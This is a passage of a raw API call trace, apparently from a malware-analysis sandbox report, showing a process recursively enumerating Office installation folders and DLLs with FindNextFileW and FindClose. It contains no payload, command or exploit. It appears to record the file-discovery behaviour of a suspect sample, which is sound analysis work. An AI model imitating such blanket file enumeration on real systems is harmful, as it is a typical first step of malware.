lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf17ee5c3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf17ee5c3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf17ee5c3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2074", cAlternateFileName="")) returned 1 [0165.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.411] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6354def, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6354def, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6354def, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3082", cAlternateFileName="")) returned 1 [0165.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.412] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 1 [0165.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.413] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67ce4b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x67ce4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67ce4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9242", cAlternateFileName="")) returned 0 [0165.413] FindClose (in: hFindFile=0x727548 | out: hFindFile=0x727548) returned 1 [0165.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.413] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefee59ce, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0165.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.418] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff31e88, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0165.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.422] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff580e7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0165.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.425] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefe99511, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0165.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.602] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5612cee, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5612cee, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5612cee, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ae38, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqmapi.dll", cAlternateFileName="")) returned 1 [0165.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0165.674] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0089415, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-latn", cAlternateFileName="")) returned 1 [0165.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.677] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf0063153, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0165.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.681] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf02eb98a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1681b941, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1681b941, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv", cAlternateFileName="")) returned 1 [0165.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.685] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="th", cAlternateFileName="")) returned 1 [0165.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.689] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1c40a24, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16867e02, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16867e02, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tr", cAlternateFileName="")) returned 1 [0165.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.692] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x16841bb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f913, dwReserved0=0x0, dwReserved1=0x0, cFileName="tracedefinition110.xml", cAlternateFileName="TRACED~1.XML")) returned 1 [0165.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.695] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf164abda, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vi", cAlternateFileName="")) returned 1 [0165.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.698] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xefebf763, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHS", cAlternateFileName="")) returned 1 [0165.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.702] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 1 [0165.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.704] FindNextFileW (in: hFindFile=0x727c48, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1ae94c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x16841bb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x16841bb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-CHT", cAlternateFileName="")) returned 0 [0165.704] FindClose (in: hFindFile=0x727c48 | out: hFindFile=0x727c48) returned 1 [0165.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.704] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c5a96a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c5a96a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd9d4a250, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x163c40, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="UmOutlookAddin.dll", cAlternateFileName="UMOUTL~1.DLL")) returned 1 [0165.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0165.707] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda173cc, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1b81e2e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1b680, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="AdeModule.dll", cAlternateFileName="ADEMOD~1.DLL")) returned 1 [0165.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.709] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 1 [0165.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.711] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2ad8211, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc38b3c05, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc3bd4d47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Style", cAlternateFileName="")) returned 0 [0165.711] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0165.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.711] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeda173cc, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x17774bfd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17774bfd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BORDERS", cAlternateFileName="")) returned 1 [0165.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.713] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4cf4318, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xf7e60, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="BSTORM.DLL", cAlternateFileName="")) returned 1 [0165.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.715] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc7c80c48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc7c80c48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca4703d4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2ee58, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="CONTAB32.DLL", cAlternateFileName="")) returned 1 [0165.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.791] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6b60d2f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6b60d2f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6b60d2f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x90e8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DELIMWIN.FAE", cAlternateFileName="")) returned 1 [0165.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.817] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeda3d618, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeda3d618, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1b6c9560, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5bd0a0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="cpprest140_2_6.dll", cAlternateFileName="CPPRES~1.DLL")) returned 1 [0165.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x7275c8, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="16", cAlternateFileName="")) returned 0 [0165.828] FindClose (in: hFindFile=0x7275c8 | out: hFindFile=0x7275c8) returned 1 [0165.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d9058b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d9058b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0165.828] FindClose (in: hFindFile=0x727548 | out: hFindFile=0x727548) returned 1 [0165.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.828] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4d40834, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x17dec0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="DRILLDWN.DLL", cAlternateFileName="")) returned 1 [0165.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0165.835] FindNextFileW (in: hFindFile=0x727548, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb548de7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xeff0bc27, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1033", cAlternateFileName="")) returned 0 [0165.835] FindClose (in: hFindFile=0x727548 | out: hFindFile=0x727548) returned 1 [0165.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0165.835] FindNextFileW (in: hFindFile=0x728408, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d91898, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1d91898, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x4dd9107, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x15f450, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="GANTT.DLL", cAlternateFileName="")) returned 1 [0165.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ManagedObjects", cAlternateFileName="MANAGE~1")) returned 1 [0165.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 1 [0165.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x727888, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18681a5c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18681a5c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Servers", cAlternateFileName="")) returned 0 [0165.836] FindClose (in: hFindFile=0x727888 | out: hFindFile=0x727888) returned 1 [0165.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.836] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x186355ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1865b8d4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1865b8d4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verisign", cAlternateFileName="")) returned 1 [0165.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0165.838] FindNextFileW (in: hFindFile=0x727948, lpFindFileData=0x3b3eb94 | out: lpFindFileData=0x3b3eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1865b8d4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Components", cAlternateFileName="COMPON~1")) returned 0 [0165.838] FindClose (in: hFindFile=0x727948 | out: hFindFile=0x727948) returned 1 [0165.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0165.838] FindNextFileW (in: hFindFile=0x727a08, lpFindFileData=0x3b3ee10 | out: lpFindFileData=0x3b3ee10*(dwFileAttributes=0x10, 